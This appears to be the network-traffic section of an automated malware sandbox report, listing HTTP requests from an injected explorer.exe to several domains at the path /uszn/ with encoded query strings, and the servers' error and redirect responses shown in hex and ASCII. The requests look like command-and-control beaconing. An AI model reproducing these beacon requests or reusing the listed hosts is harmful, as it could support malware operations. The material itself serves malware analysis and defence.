                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 68 61 6e 64 3b 20 7d 0d 0a 20 20
                                                                        Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
                                                                        Feb 23, 2021 10:07:34.844474077 CET2187INData Raw: 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 33 39 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 20 77 69 64 74 68 3a 20 34 34 30 70 78 3b 20 6f 76 65 72 66
                                                                        Data Ascii: @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; }
                                                                        Feb 23, 2021 10:07:34.844491005 CET2188INData Raw: 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e e5 a0 86 e6 a0 88 e8 b7 9f e8 b8 aa 3a 3c 2f 62 3e 20 3c 62 72 3e 3c 62 72 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                        Data Ascii: <br> <b>:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>[ArgumentNullException: null
                                                                        Feb 23, 2021 10:07:34.844508886 CET2189INData Raw: 20 53 79 73 74 65 6d 2e 57 65 62 2e 48 74 74 70 41 70 70 6c 69 63 61 74 69 6f 6e 2e 53 79 6e 63 45 76 65 6e 74 45 78 65 63 75 74 69 6f 6e 53 74 65 70 2e 53 79 73 74 65 6d 2e 57 65 62 2e 48 74 74 70 41 70 70 6c 69 63 61 74 69 6f 6e 2e 49 45 78 65
                                                                        Data Ascii: System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)-->...


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.44976123.227.38.7480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:39.943531036 CET5544OUTGET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.sissysundays.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:40.155996084 CET5545INHTTP/1.1 403 Forbidden
                                                                        Date: Tue, 23 Feb 2021 09:07:40 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: 162
                                                                        X-Sorting-Hat-ShopId: 41524953251
                                                                        X-Dc: gcp-us-central1
                                                                        X-Request-ID: a4514485-1370-4802-9169-ac7871220421
                                                                        Set-Cookie: _shopify_fs=2021-02-23T09%3A07%3A40Z; Expires=Wed, 23-Feb-22 09:07:40 GMT; Domain=sissysundays.com; Path=/; SameSite=Lax
                                                                        X-Download-Options: noopen
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 1; mode=block
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 086fbdfb48000005c87fa67000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 625fcc3edc8705c8-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{fon
                                                                        Feb 23, 2021 10:07:40.156027079 CET5546INData Raw: 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67
                                                                        Data Ascii: t-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6r
                                                                        Feb 23, 2021 10:07:40.156047106 CET5548INData Raw: b6 e0 b8 87 e0 b9 80 e0 b8 a7 e0 b9 87 e0 b8 9a e0 b9 84 e0 b8 8b e0 b8 95 e0 b9 8c e0 b8 99 e0 b8 b5 e0 b9 89 22 0a 20 20 7d 2c 0a 20 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61
                                                                        Data Ascii: " }, "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permi
                                                                        Feb 23, 2021 10:07:40.156064987 CET5549INData Raw: 20 20 22 65 6e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 73 20 64 65 6e 69 65 64 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d
                                                                        Data Ascii: "en": { "title": "Access denied", "content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
                                                                        Feb 23, 2021 10:07:40.156079054 CET5550INData Raw: 20 62 72 6f 77 73 65 72 73 0a 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 20 7c 7c 20 2f 2f 20 49 45 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67
                                                                        Data Ascii: browsers navigator.userLanguage || // IE <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = docu


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.44976235.246.6.10980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:45.340125084 CET5574OUTGET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.whereinthezooareyou.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:45.453417063 CET5575INHTTP/1.1 301 Moved Permanently
                                                                        Date: Tue, 23 Feb 2021 09:07:45 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        location: https://www.robinblumenthal.org/uszn?I48=lR8nCh02VBrVevH9DBfx7BVzy1%2FOBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX
                                                                        strict-transport-security: max-age=120
                                                                        x-wix-request-id: 1614071265.391552393778121902
                                                                        Age: 0
                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                        X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViPPFLGwJgVO8FUAmFQQjPN,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalpYUTcl7jQzo4Essi/VLLwgt8VDvZy3pJDWZp9dMiwKn3fKEXQvQlSAkB/lstal9R4Q918uQbzzG9w1LffIdX9I=,2UNV7KOq4oGjA5+PKsX47F8xRgV30iIDzySL0NmaUxo=,m7d0zj9X6FBqkyAIyh66vEUuqjNSZoImFoqkUKlu7gqTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,4EmzKGKKpFffqfFwZRPY8boZ8ve2m8xk1D+l4lZPQBgFvmIDoEcoOIUTBKMVcbKcH2yWikl2EP5bJKtoyukhjw==
                                                                        Cache-Control: no-cache
                                                                        Expires: -1
                                                                        Server: Pepyaka/1.19.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:50.608117104 CET5576OUTGET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.fertinvitro.doctor
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:50.751897097 CET5577INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 09:07:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6031584e-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.449764184.106.16.22380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:56.064671040 CET5577OUTGET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.dgcsales.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:56.290729046 CET5578INHTTP/1.1 302 Found
                                                                        cache-control: private
                                                                        content-type: text/html; charset=utf-8
                                                                        location: http://www.dmt.ca/nosite.html
                                                                        date: Tue, 23 Feb 2021 09:07:56 GMT
                                                                        content-length: 146
                                                                        connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6d 74 2e 63 61 2f 6e 6f 73 69 74 65 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.dmt.ca/nosite.html">here</a>.</h2></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.449765118.27.99.8480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:01.909493923 CET5580OUTGET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.horisan-touki.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:02.207866907 CET5580INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Tue, 23 Feb 2021 09:08:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.horisan-touki.com/uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.449766202.66.173.11680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:08.227961063 CET5581OUTGET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.karthikeyainfraindia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:08.410000086 CET5583INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Server: Microsoft-IIS/8.0
                                                                        X-Powered-By: ASP.NET
                                                                        X-Powered-By-Plesk: PleskWin
                                                                        Date: Tue, 23 Feb 2021 09:08:03 GMT
                                                                        Connection: close
                                                                        Content-Length: 1245
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65
